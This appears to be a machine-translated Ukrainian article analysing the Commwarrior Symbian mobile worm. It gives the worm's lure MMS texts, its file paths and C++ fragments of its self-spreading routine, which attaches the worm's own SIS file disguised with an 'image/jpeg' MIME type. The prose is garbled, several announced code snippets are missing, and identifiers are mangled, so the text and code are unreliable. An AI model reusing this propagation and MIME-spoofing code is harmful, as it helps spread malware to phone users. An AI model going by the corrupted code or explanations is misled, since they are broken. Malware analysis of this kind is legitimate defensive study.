Зараження телефону вірусами з mms-собщений, catamobile
Використання популярного особливо серед молоді MMS-сервісу таїть в собі чимало небезпек, про які більшість користувачів, на жаль, не підозрює.
Проте, в умовах падіння цін на мобільний Інтернет, появи безлімітних тарифів. популяризації MMS-сервісу, а також при відповідному розвитку вірусних технологій, подібні сценарії в майбутньому можуть стати цілком реальними.
MMS-повідомлення вірусу Commwarrior містять текст, що спонукає відкрити повідомлення, і файл commw.sis. Розширення прикріпленого файлу SIS вказує на те, що файл є виконуваним для платформи Symbian - найпоширенішою операційної системи для мобільних пристроїв в даний час.
Остання версія вірусу Commwarrior розсилає жертвам MMS з наступними повідомленнями:
Тема: 3DNow!
Повідомлення: 3DGame from me. It is FREE!
Тема: MatrixRemover
Повідомлення: Matrix has you. Remove matrix!
Тема: Nokia ringtoner
Повідомлення: Nokia RingtoneManager for all models.
Після того, як у якому Commwarrior SIS файл буде встановлено, що виконуються файли будуть поміщені в папку:
При виконанні commwarrior.exe вірус копіюється в папки
\ System \ updates \ commrec.mdl
\ System \ updates \ commwarrior.exe
\ System \ updates \ commw.sis
Після створення файлу \ system \ updates \ commw.sis вірус приступає до розсилки MMS-повідомлень.
Розглянемо деякі деталі механізму зараження за допомогою MMS-повідомлень. Наведені уривки програмного «тіла» вірусу є неповними з міркувань безпеки, а сам розбирається код відноситься лише до відправки MMS-повідомлень і ніяк не пов'язаний з шкідливою навантаженням вірусу.
Отже, спочатку вірус створює сесію для роботи з центром повідомлень. Робиться це за допомогою наступного оператора.
Отриманий ідентифікатор сесії використовується для створення клієнта, який буде звертатися до центру повідомлень. Такий клієнт створюється наступним чином.
Так як робота з центром повідомлень ведеться тільки для відправки MMS-повідомлень, то необхідно виконати перетворення створеного клієнта в MMS-клієнт.
iMmsMtm = mstatic_cast
(IMtmReg-> NewMtmL (KUidMsgTypeMultimedia));
Метод SwitchCurrentEntryL, що викликається з параметром Kmsv-DraftEntryld, показує, що поточним місцем створення якраз вибирається каталог «Drafts», тобто якраз каталог «Чернетки». Після того, як каталог визначено, створюється MMS-повідомлення з параметрами «за замовчуванням». Робиться це за допомогою наступного виклику:
Далі треба форматувати основні поля повідомлення MMS. Для цього за допомогою макросу _LIT инициализируются основні змінні. В операційній системі Symbian макрос JLIT створює змінні. Таким чином, з його допомогою визначаються наступні змінні:
_LIT (KSamsNumber, "07738123456");
_LIT (KSamsAlias, "Sam");
_LIT (KPetesNumber, "07812654321");
_LIT (KMessageSubject, "Nokia ringtoner");
Змінні можуть носити довільні імена. У наведеному прикладі в змінної KSamsNumber зберігається номер атакується абонента, а в створюваної змінної KSamsAlias зберігається його ім'я, вказане в записнику. У змінну KPetesNumber вписується номер відправника, а в створену змінну KMessageSubject записується тема повідомлення. Після того як всі змінні сформовані, здійснюється ініціалізація полів уже створеного MMS-повідомлення. Робиться це за допомогою методів AddAddresseeL і SetSubjectL. Першим методом передається параметр EmsvRecipientTo, який визначає поле відправника. Параметр EmsvRecipientCc инициализирует поле одержувача.
iMmsMtm-> AddAddresseeL (EMsvRecipientTo, KSamsNumber, KSamsAlias);
iMmsMtm-> AddAddresseeL (EMsvRecipientCc, KPetesNumber);
iMmsMtm-> SetSubjectL (KMessageSubject);
Далі йде основний процес - прикріплення додатка.
Для цього спочатку створюється змінна з ім'ям прикріплюватися до повідомлення файлу. В даному випадку в MMS відправляється сам вірус. Тому в якості імені файлу вказується ім'я вірусної програми.
Після того як змінна инициализирована, створюється екземпляр класу TfileName, який описує прикріплене послання. За допомогою методу Append створеного об'єкта attachmentFile инициализируются такі дані, як шлях до файлу та ім'я самого файлу.
TFileName attachmentFile (KPhoneRootPath);
attachmentFile.Append (KDirPictures);
attachmentFile. Append (KFileName);
Після скоєння цих дій вірус створює і описує службову інформацію за типами прикріплених файлів. Зазвичай вірус навмисно вказує невірний тип прикріпленого файлу (mime-тип), наприклад, JPG, щоб користувач не запідозрив атаку при передачі йому файлу по MMS. Визначаються mime типи за допомогою наступного програмного коду.
CMsvMimeHeaders * mimeHeaders = CMsvMimeHeaders :: NewL ();
CleanupStack :: PushL (mimeHeaders);
mimeHeaders->
SetSuggestedFilenameL (KFileName);
_UT8 (KMimeType, "image / jpeg");
TBufC8
mimeType (KMimeType);
Далі инициализируются дані про отправляемом повідомленні.
CMsvAttachment * attalnfo = CMsvAttachment :: NewL (CMsvAttachment :: EMsvFile);
CleanupStack :: PushL (attalnfo);
_UT8 (KMimeType, "image / jpeg");
TBufC8 mimeType (KMimeType);
У наведених вище рядках описується те, що в MMS-повідомлення прикріплений тільки один файл. Після того, як всі необхідні приготування виконані, викликається метод Create Attachment 2 L і MMS-повідомлення створюється.
iMmsMtm-> CreateAttachment2L (
* Store,
attachment,
mimeType,
* MimeHeaders,
attalnfo,
attachld);
CleanupStack :: Pop (attalnfo);
CleanupStack :: PopAndDestroy (mimeHeaders);
формування повідомлення завершується за допомогою наступних програмних рядків.
store-> CommitL ();
attachment.Close ();
CleanupStack :: PopAndDestroy (attachment);
CleanupStack :: PopAndDestroy (store);
Саме лист залишиться після повної підготовки з допомогою методу SaveMessageL ().
Нарешті відправка повідомлення здійснюється наступним чином.
ЗАХИСТ ВІД АТАКИ
Якщо вірус все ж потрапив на ваш мобільний пристрій, то можливість безболісно від нього позбутися все ж існує. Ви можете особисто видалити шкідливий файл, якщо знаєте, де його знайти. У разі, якщо вас атакував невідомий вірус, то доведеться витратити багато часу, щоб його виявити. При цьому необхідно бути акуратним, щоб випадково не видалити системні файли.